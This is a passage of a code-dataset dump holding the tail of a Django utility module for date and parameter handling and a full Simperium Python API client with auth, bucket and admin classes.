tz=pytz.utc)\n except ValueError:\n logger.error(\"illegal parameter format :%s\" % time)\n return None\n\n\ndef format_datetime(dt):\n \"\"\"\n 时间转换为字符串格式(附带时区)\n :param dt: type:datetime.datetime\n :return:\n \"\"\"\n # translate to time in local timezone\n if not dt:\n return ''\n if timezone.is_aware(dt):\n dt = timezone.localtime(dt)\n return dt.strftime(\"%Y-%m-%d %H:%M:%S %z\")\n\n\ndef check_and_rename_params(conditions, group_by, group_by_check=AE.group_list):\n \"\"\"\n 检验参数是否正确\n :param conditions:参数是一个dict\n :param group_by:分组凭据\n :param group_by_check:分组检查内容\n :return:\n \"\"\"\n # conditions 是否是一个dict.\n # 本地测试时请注释该try\n result_dict = {'success': False, 'content': None, \"conditions\": conditions, \"group_by\": None}\n try:\n conditions = json.loads(conditions)\n except Exception:\n message = u\"param conditions[%s] cannot be converted to dict\" % conditions\n logger.error(message)\n result_dict['content'] = message\n return result_dict\n if 'biz_cc_id' in conditions:\n conditions.update(business__cc_id=conditions.pop('biz_cc_id'))\n if not isinstance(conditions, dict):\n message = u\"params conditions[%s] are invalid dict data\" % conditions\n logger.error(message)\n result_dict['content'] = message\n return result_dict\n # 检查传递分组是否有误\n if group_by not in group_by_check:\n message = u\"params group_by[%s] is invalid\" % group_by\n logger.error(message)\n result_dict['content'] = message\n return result_dict\n # 如果是 biz_cc_id 需要转换\n # 为了防止显示出现外键调用\n if group_by == 'biz_cc_id':\n group_by = 'business__cc_id'\n result_dict['success'] = True\n result_dict['group_by'] = group_by\n result_dict['conditions'] = conditions\n return result_dict\n\n\ndef convert_group_name(biz_cc_id, role):\n return '%s\\x00%s' % (biz_cc_id, role)\n\n\ndef camel_case_to_underscore_naming(source):\n \"\"\"\n 将驼峰形式字符串转为下划线形式\n :param source:\n :return:\n \"\"\"\n if not isinstance(source, six.string_types):\n return source\n result = ''\n for i, s in enumerate(source):\n if i == 0:\n result += s.lower()\n else:\n if s.isupper():\n if source[i - 1].islower():\n result += '_' + s.lower()\n else:\n result += s.lower()\n else:\n result += s\n return result\n\n\ndef gen_day_dates(start_time, days):\n \"\"\"\n 获取两个日期之间的所有日期\n :param start_time: 开始时间:\n :param days: 相差日期:\n :return:\n \"\"\"\n day = datetime.timedelta(days=1)\n for index in range(days):\n yield start_time + day * index\n\n\ndef get_month_dates(start_time, end_time):\n \"\"\"\n 获取两个日期之间的所有月份\n :param start_time: 开始时间:\n :param end_time: 结束时间\n :return:\n \"\"\"\n out_dates = []\n # 需要额外是最后一天的情况,需要增加一天\n _, last_day = calendar.monthrange(start_time.year, start_time.month)\n if last_day == start_time.day:\n start_time += datetime.timedelta(days=1)\n while start_time <= end_time:\n date_str = start_time.strftime('%Y-%m')\n if date_str not in out_dates:\n out_dates.append(date_str)\n start_time = add_months(start_time, 1)\n return out_dates\n\n\ndef add_months(dt, months):\n \"\"\"\n 添加N个月份\n :param dt: 开始时间:\n :param months: 增加的月份\n :return:\n \"\"\"\n month = dt.month - 1 + months\n year = dt.year + month / 12\n month = month % 12 + 1\n return dt.replace(year=year, month=month)\n", "sub_path": "gcloud/core/utils/sites/open/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 22154, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 44, "usage_type": "call"}, {"api_name": "gcloud.conf.settings.ESB_GET_CLIENT_BY_USER", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gcloud.conf.settings", "line_number": 45, "usage_type": "name"}, {"api_name": "gcloud.conf.settings.DEFAULT_CACHE_TIME_FOR_CC", "line_number": 47, "usage_type": "attribute"}, {"api_name": "gcloud.conf.settings", "line_number": 47, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 59, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 59, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 77, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 77, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Unauthorized", "line_number": 79, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 79, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 82, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 82, "usage_type": "name"}, {"api_name": "gcloud.exceptions.APIError", "line_number": 84, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 84, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 102, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 102, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.get_user_info", "line_number": 104, "usage_type": "call"}, {"api_name": "django.core.cache.cache.set", "line_number": 109, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 109, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Unauthorized", "line_number": 111, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 111, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 114, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 114, "usage_type": "name"}, {"api_name": "gcloud.exceptions.APIError", "line_number": 116, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 116, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.get", "line_number": 132, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 132, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 134, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 134, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 150, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 150, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Unauthorized", "line_number": 153, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 153, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 156, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 156, "usage_type": "name"}, {"api_name": "gcloud.exceptions.APIError", "line_number": 158, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 158, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 164, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 164, "usage_type": "name"}, {"api_name": "gcloud.core.roles.MAINTAINERS", "line_number": 173, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 173, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.get_or_create", "line_number": 177, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 177, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 177, "usage_type": "name"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 180, "usage_type": "call"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 181, "usage_type": "call"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects.get_or_create", "line_number": 183, "usage_type": "call"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects", "line_number": 183, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.BusinessGroupMembership", "line_number": 183, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 195, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 195, "usage_type": "name"}, {"api_name": "gcloud.core.roles.ALL_ROLES", "line_number": 200, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 200, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.get_or_create", "line_number": 202, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 202, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 202, "usage_type": "name"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 207, "usage_type": "call"}, {"api_name": "gcloud.core.roles.ADMIN_ROLES", "line_number": 210, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 210, "usage_type": "name"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 211, "usage_type": "call"}, {"api_name": "django.db.transaction.atomic", "line_number": 213, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 213, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.select_for_update", "line_number": 215, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 215, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 215, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.DoesNotExist", "line_number": 216, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 216, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 219, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 219, "usage_type": "name"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects.get_or_create", "line_number": 232, "usage_type": "call"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects", "line_number": 232, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.BusinessGroupMembership", "line_number": 232, "usage_type": "name"}, {"api_name": "gcloud.core.roles.CC_V2_ROLE_MAP.get", "line_number": 238, "usage_type": "call"}, {"api_name": "gcloud.core.roles.CC_V2_ROLE_MAP", "line_number": 238, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 238, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 240, "usage_type": "call"}, {"api_name": "gcloud.core.roles.FUNCTOR", "line_number": 244, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 244, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.get_operate_user_list", "line_number": 245, "usage_type": "call"}, {"api_name": "gcloud.core.roles.AUDITOR", "line_number": 248, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 248, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.get_auditor_user_list", "line_number": 249, "usage_type": "call"}, {"api_name": "django.core.cache.cache.set", "line_number": 257, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 257, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.all", "line_number": 264, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 264, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 264, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 265, "usage_type": "call"}, {"api_name": "gcloud.core.roles.AUDITOR", "line_number": 269, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 269, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.get_or_create", "line_number": 270, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 270, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 270, "usage_type": "name"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 274, "usage_type": "call"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects.get_or_create", "line_number": 276, "usage_type": "call"}, {"api_name": "gcloud.core.models.BusinessGroupMembership.objects", "line_number": 276, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.BusinessGroupMembership", "line_number": 276, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 286, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 286, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.update_or_create", "line_number": 297, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 297, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 297, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 304, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 304, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.adapt_get_user_data", "line_number": 310, "usage_type": "call"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 311, "usage_type": "call"}, {"api_name": "django.core.cache.cache.get", "line_number": 320, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 320, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.get_user_info", "line_number": 323, "usage_type": "call"}, {"api_name": "gcloud.exceptions.Unauthorized", "line_number": 327, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 327, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 329, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 329, "usage_type": "name"}, {"api_name": "gcloud.exceptions.APIError", "line_number": 331, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 331, "usage_type": "name"}, {"api_name": "gcloud.conf.settings.ESB_AUTH_COMPONENT_SYSTEM", "line_number": 332, "usage_type": "attribute"}, {"api_name": "gcloud.conf.settings", "line_number": 332, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 337, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 337, "usage_type": "name"}, {"api_name": "gcloud.core.api_adapter.is_user_functor", "line_number": 343, "usage_type": "call"}, {"api_name": "gcloud.core.api_adapter.is_user_auditor", "line_number": 343, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects.filter", "line_number": 347, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 347, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 347, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 349, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 349, "usage_type": "name"}, {"api_name": "gcloud.exceptions.Forbidden", "line_number": 357, "usage_type": "call"}, {"api_name": "gcloud.exceptions", "line_number": 357, "usage_type": "name"}, {"api_name": "gcloud.core.roles.CC_V2_ROLE_MAP.values", "line_number": 371, "usage_type": "call"}, {"api_name": "gcloud.core.roles.CC_V2_ROLE_MAP", "line_number": 371, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 371, "usage_type": "name"}, {"api_name": "django.core.cache.cache.get", "line_number": 381, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 381, "usage_type": "name"}, {"api_name": "gcloud.core.roles.CC_V2_ROLE_MAP", "line_number": 382, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 382, "usage_type": "name"}, {"api_name": "gcloud.core.roles.MAINTAINERS", "line_number": 382, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business.objects.get", "line_number": 404, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 404, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 404, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.DoesNotExist", "line_number": 405, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 405, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.update_or_create", "line_number": 409, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 409, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 409, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 424, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 424, "usage_type": "name"}, {"api_name": "gcloud.core.models.Business.objects.get", "line_number": 437, "usage_type": "call"}, {"api_name": "gcloud.core.models.Business.objects", "line_number": 437, "usage_type": "attribute"}, {"api_name": "gcloud.core.models.Business", "line_number": 437, "usage_type": "name"}, {"api_name": "gcloud.core.roles.MAINTAINERS", "line_number": 438, "usage_type": "attribute"}, {"api_name": "gcloud.core.roles", "line_number": 438, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.get", "line_number": 441, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 441, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 441, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.DoesNotExist", "line_number": 442, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 442, "usage_type": "name"}, {"api_name": "django.utils.timezone.localtime", "line_number": 492, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 492, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 492, "usage_type": "call"}, {"api_name": "django.utils.timezone.localtime", "line_number": 497, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 497, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 510, "usage_type": "call"}, {"api_name": "django.utils.timezone.datetime.fromtimestamp", "line_number": 525, "usage_type": "call"}, {"api_name": "django.utils.timezone.datetime", "line_number": 525, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 525, "usage_type": "name"}, {"api_name": "pytz.utc", "line_number": 525, "usage_type": "attribute"}, {"api_name": "django.utils.timezone.is_aware", "line_number": 540, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 540, "usage_type": "name"}, {"api_name": "django.utils.timezone.localtime", "line_number": 541, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 541, "usage_type": "name"}, {"api_name": "gcloud.core.constant.AE.group_list", "line_number": 545, "usage_type": "attribute"}, {"api_name": "gcloud.core.constant.AE", "line_number": 545, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 557, "usage_type": "call"}, {"api_name": "django.utils.six.string_types", "line_number": 596, "usage_type": "attribute"}, {"api_name": "django.utils.six", "line_number": 596, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 620, "usage_type": "call"}, {"api_name": "calendar.monthrange", "line_number": 634, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 636, "usage_type": "call"}]} +{"seq_id": "531504317", "text": "import os\nimport uuid\nfrom typing import Any, Dict, List, Optional, Tuple, Union\n\nimport requests\n\n\nclass Auth(object):\n \"\"\"\n example use:\n\n >>> from simperium.core import Auth\n >>> auth = Auth('myapp', 'cbbae31841ac4d44a93cd82081a5b74f')\n >>> Auth.create('john@company.com', 'secret123')\n 'db3d2a64abf711e0b63012313d001a3b'\n \"\"\"\n\n def __init__(\n self,\n appname: str,\n api_key: str,\n host: Optional[str] = None,\n scheme: str = \"https\",\n ) -> None:\n \"\"\"\n Inits the Auth class.\n \"\"\"\n if not host:\n host = os.environ.get(\"SIMPERIUM_AUTHHOST\", \"auth.simperium.com\")\n self.appname = appname\n self.api_key = api_key\n self.host = host\n self.scheme = scheme\n\n def _build_url(self, endpoint: str) -> str:\n return \"{}://{}/1/{}\".format(self.scheme, self.host, endpoint)\n\n def create(self, username: str, password: str) -> Optional[str]:\n \"\"\"\n Create a new user with `username` and `password`.\n Returns the user access token if successful, or raises an error\n otherwise.\n \"\"\"\n\n data = {\"username\": username, \"password\": password}\n headers = {\"X-Simperium-API-Key\": self.api_key}\n\n url = self._build_url(self.appname + \"/create/\")\n r = requests.post(url, json=data, headers=headers)\n r.raise_for_status()\n return r.json().get(\"access_token\")\n\n def authorize(self, username: str, password: str) -> str:\n \"\"\"\n Get the access token for a user.\n Returns the access token as a string or raises an error on failure.\n \"\"\"\n data = {\"username\": username, \"password\": password}\n headers = {\"X-Simperium-API-Key\": self.api_key}\n\n url = self._build_url(self.appname + \"/authorize/\")\n r = requests.post(url, json=data, headers=headers)\n r.raise_for_status()\n return r.json()[\"access_token\"]\n\n\nclass Bucket(object):\n \"\"\"\n example use:\n\n >>> from simperium.core import Bucket\n >>> bucket = Bucket('myapp', 'db3d2a64abf711e0b63012313d001a3b', 'mybucket')\n >>> bucket.set('item2', {'age': 23})\n True\n >>> bucket.set('item2', {'age': 25})\n True\n >>> bucket.get('item2')\n {'age': 25}\n >>> bucket.get('item2', version=1)\n {'age': 23}\n \"\"\"\n\n BATCH_DEFAULT_SIZE = 100\n\n def __init__(\n self,\n appname: str,\n auth_token: str,\n bucket: str,\n userid: Optional[str] = None,\n host: Optional[str] = None,\n scheme: str = \"https\",\n clientid: Optional[str] = None,\n ) -> None:\n\n if not host:\n host = os.environ.get(\"SIMPERIUM_APIHOST\", \"api.simperium.com\")\n\n self.userid = userid\n self.host = host\n self.scheme = scheme\n self.appname = appname\n self.bucket = bucket\n self.auth_token = auth_token\n if clientid:\n self.clientid = clientid\n else:\n self.clientid = \"py-%s\" % uuid.uuid4().hex\n\n def _auth_header(self) -> Dict[str, str]:\n headers = {\"X-Simperium-Token\": \"%s\" % self.auth_token}\n if self.userid:\n headers[\"X-Simperium-User\"] = self.userid\n return headers\n\n def _gen_ccid(self) -> str:\n return uuid.uuid4().hex\n\n def _build_url(self, endpoint: str) -> str:\n return \"{}://{}/1/{}\".format(self.scheme, self.host, endpoint)\n\n def index(\n self,\n data: bool = False,\n mark: Optional[str] = None,\n limit: Optional[int] = None,\n since: Optional[str] = None,\n ) -> Dict[Any, Any]:\n \"\"\"\n retrieve a page of the latest versions of a buckets documents\n ordered by most the most recently modified.\n\n @mark: mark the documents returned to be modified after the\n given cv\n @limit: limit page size to this number. max 1000, default 100.\n @since: limit page to documents changed since the given cv.\n @data: include the current data state of each document in the\n result. by default data is not included.\n\n returns: {\n 'current': head cv of the most recently modified document,\n 'mark': cv to use to pull the next page of documents. only\n included in the repsonse if there are remaining pages\n to fetch.\n 'count': the total count of documents available,\n\n 'index': [{\n 'id': id of the document,\n 'v: current version of the document,\n 'd': optionally current data of the document, if\n data is requested\n }, {....}],\n }\n \"\"\"\n url = self._build_url(\"%s/%s/index\" % (self.appname, self.bucket))\n\n params = {\n \"mark\": str(mark) if mark is not None else None,\n \"limit\": str(limit) if limit is not None else None,\n \"since\": str(since) if since is not None else None,\n \"data\": \"1\" if data else None,\n }\n\n r = requests.get( # type: ignore\n url, headers=self._auth_header(), params=params\n )\n r.raise_for_status()\n return r.json()\n\n def get(\n self, item: str, default: Any = None, version: Optional[int] = None\n ) -> Union[Any, Dict[Any, Any]]:\n \"\"\"\n Retrieves either the latest version of item from this bucket, or the\n specific version requested.\n Returns `default` on a 404, raises error on http error\n\n `version` should be an integer > 0\n \"\"\"\n url = \"%s/%s/i/%s\" % (self.appname, self.bucket, item)\n if version is not None:\n url += \"/v/%s\" % version\n url = self._build_url(url)\n\n r = requests.get(url, headers=self._auth_header())\n if r.status_code == 404:\n return default\n r.raise_for_status()\n\n return r.json()\n\n def post(\n self,\n item: str,\n data: Dict[Any, Any],\n version: Optional[int] = None,\n ccid: Optional[str] = None,\n include_response: bool = False,\n replace: bool = False,\n ) -> Optional[Union[str, Tuple[str, Dict[Any, Any]]]]:\n \"\"\"\n Posts the supplied data to `item`.\n\n If `include_response` is True, returns a tuple of (`item`, the json\n response). Otherwise, returns `item`)\n\n `version` should be an integer > 0\n \"\"\"\n ccid = ccid if ccid else self._gen_ccid()\n\n url = \"%s/%s/i/%s\" % (self.appname, self.bucket, item)\n if version is not None:\n url += \"/v/%s\" % version\n url = self._build_url(url)\n\n params = {\n \"clientid\": self.clientid,\n \"ccid\": ccid,\n \"response\": 1 if include_response else None,\n \"replace\": 1 if replace else None,\n }\n\n r = requests.post(url, json=data, headers=self._auth_header(), params=params)\n r.raise_for_status()\n if include_response:\n return item, r.json()\n else:\n return item\n\n def bulk_post(\n self, bulk_data: Dict[Any, Any], wait: bool = True\n ) -> Union[bool, Dict[Any, Any]]:\n \"\"\"\n posts multiple items at once, bulk_data should be a map like:\n\n { \"item1\" : { data1 },\n \"item2\" : { data2 },\n ...\n }\n\n returns an array of change responses (check for error codes)\n \"\"\"\n changes_list = []\n for itemid, data in list(bulk_data.items()):\n change = {\"id\": itemid, \"o\": \"M\", \"v\": {}, \"ccid\": self._gen_ccid()}\n # manually construct jsondiff, equivalent to jsondiff.diff( {}, data )\n for k, v in list(data.items()):\n change[\"v\"][k] = {\"o\": \"+\", \"v\": v}\n\n changes_list.append(change)\n\n url = \"%s/%s/changes\" % (self.appname, self.bucket)\n url = self._build_url(url)\n params = {\"clientid\": self.clientid}\n params[\"wait\"] = \"1\"\n\n r = requests.post(\n url, json=changes_list, headers=self._auth_header(), params=params\n )\n r.raise_for_status()\n\n if not wait:\n # changes successfully submitted - check /changes\n return True\n\n # check each change response for 'error'\n return r.json()\n\n def new(\n self,\n data: Dict[Any, Any],\n ccid: Optional[str] = None,\n include_response: bool = False,\n ) -> Optional[Union[str, Tuple[str, Dict[Any, Any]]]]:\n return self.post(\n uuid.uuid4().hex, data, ccid=ccid, include_response=include_response\n )\n\n def set(\n self,\n item: str,\n data: Dict[Any, Any],\n version: Optional[int] = None,\n ccid: Optional[str] = None,\n include_response: bool = False,\n replace: bool = False,\n ) -> Optional[Union[str, Tuple[str, Dict[Any, Any]]]]:\n return self.post(\n item,\n data,\n version=version,\n ccid=ccid,\n include_response=include_response,\n replace=replace,\n )\n\n def delete(self, item: str, version: Optional[int] = None) -> Optional[str]:\n \"\"\"\n Deletes the item from bucket.\n Returns the ccid if the response is not an empty string.\n\n `version` should be an integer > 0\n \"\"\"\n ccid = self._gen_ccid()\n url = \"%s/%s/i/%s\" % (self.appname, self.bucket, item)\n if version is not None:\n url += \"/v/%s\" % version\n url = self._build_url(url)\n params = {\"clientid\": self.clientid, \"ccid\": ccid}\n r = requests.delete(url, headers=self._auth_header(), params=params)\n r.raise_for_status()\n if not r.text.strip():\n return ccid\n return None\n\n def changes(self, cv=None, timeout=None):\n \"\"\"\n retrieves updates for this bucket for this user\n\n @cv: if supplied only updates that occurred after this\n change version are retrieved.\n\n @timeout: the call will wait for updates if not are immediately\n available. by default it will wait indefinitely. if a timeout\n is supplied an empty list will be return if no updates are made\n before the timeout is reached.\n \"\"\"\n url = \"%s/%s/changes\" % (self.appname, self.bucket)\n url = self._build_url(url)\n params = {\"clientid\": self.clientid}\n if cv is not None:\n params[\"cv\"] = cv\n headers = self._auth_header()\n r = requests.get(url, headers=headers, timeout=timeout, params=params)\n r.raise_for_status()\n return r.json()\n\n def all(\n self,\n cv: Optional[str] = None,\n data: bool = False,\n username: bool = False,\n most_recent: bool = False,\n timeout: Optional[int] = None,\n skip_clientids: List[str] = [],\n batch: Optional[int] = None,\n ) -> Union[List[Any], Dict[Any, Any]]:\n \"\"\"\n retrieves *all* updates for this bucket, regardless of the user\n which made the update.\n\n @cv: if supplied only updates that occurred after this\n change version are retrieved.\n\n @data: if True, also include the lastest version of the data for\n changed entity\n\n @username: if True, also include the username that created the\n change\n\n @most_recent: if True, then only the most recent change for each\n document in the current page will be returned. e.g. if a\n document has been recently changed 3 times, only the latest of\n those 3 changes will be returned.\n\n @timeout: the call will wait for updates if not are immediately\n available. by default it will wait indefinitely. if a timeout\n is supplied an empty list will be return if no updates are made\n before the timeout is reached.\n \"\"\"\n url = \"%s/%s/all\" % (self.appname, self.bucket)\n url = self._build_url(url)\n\n params = {\n \"clientid\": self.clientid,\n \"cv\": cv,\n \"skip_clientid\": skip_clientids,\n \"batch\": str(batch) if batch is not None else str(self.BATCH_DEFAULT_SIZE),\n \"username\": \"1\" if username else None,\n \"data\": \"1\" if data else None,\n \"most_recent\": \"1\" if most_recent else None,\n }\n headers = self._auth_header()\n r = requests.get( # type: ignore\n url, headers=headers, timeout=timeout, params=params\n )\n r.raise_for_status()\n return r.json()\n\n\nclass SPUser(object):\n \"\"\"\n example use:\n\n >>> from simperium.core import SPUser\n >>> user = SPUser('myapp', 'db3d2a64abf711e0b63012313d001a3b')\n >>> bucket.post({'age': 23})\n True\n >>> bucket.get()\n {'age': 23}\n \"\"\"\n\n def __init__(\n self,\n appname: str,\n auth_token: str,\n host: Optional[str] = None,\n scheme: str = \"https\",\n clientid: Optional[str] = None,\n ) -> None:\n\n self.bucket = Bucket(\n appname, auth_token, \"spuser\", host=host, scheme=scheme, clientid=clientid\n )\n\n def get(self) -> Dict[Any, Any]:\n return self.bucket.get(\"info\")\n\n def post(\n self, data: Dict[Any, Any]\n ) -> Optional[Union[str, Tuple[str, Dict[Any, Any]]]]:\n return self.bucket.post(\"info\", data)\n\n\nclass Api(object):\n def __init__(\n self,\n appname: str,\n auth_token: str,\n userid: Optional[str] = None,\n host: Optional[str] = None,\n scheme: str = \"https\",\n clientid: Optional[str] = None,\n ) -> None:\n self.appname = appname\n self.token = auth_token\n self.userid = userid\n self.host = host\n self.scheme = scheme\n self.clientid = clientid\n\n def __getattr__(self, name: str) -> Union[SPUser, Bucket]:\n return Api.__getitem__(self, name)\n\n def __getitem__(self, name: str) -> Union[SPUser, Bucket]:\n if name.lower() == \"spuser\":\n return SPUser(\n self.appname,\n self.token,\n host=self.host,\n scheme=self.scheme,\n clientid=self.clientid,\n )\n return Bucket(\n self.appname,\n self.token,\n name,\n userid=self.userid,\n host=self.host,\n scheme=self.scheme,\n clientid=self.clientid,\n )\n\n\nclass Admin(Api):\n def __init__(\n self,\n appname: str,\n admin_token: str,\n host: Optional[str] = None,\n scheme: str = \"https\",\n clientid: Optional[str] = None,\n ) -> None:\n self.appname = appname\n self.token = admin_token\n self.host = host\n self.scheme = scheme\n self.clientid = clientid\n\n def as_user(self, userid: str) -> Api:\n return Api(\n self.appname,\n self.token,\n userid=userid,\n host=self.host,\n scheme=self.scheme,\n clientid=self.clientid,\n )\n", "sub_path": "simperium/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 15266, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "typing.Optional", "line_number": 22, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 29, "usage_type": "call"}, 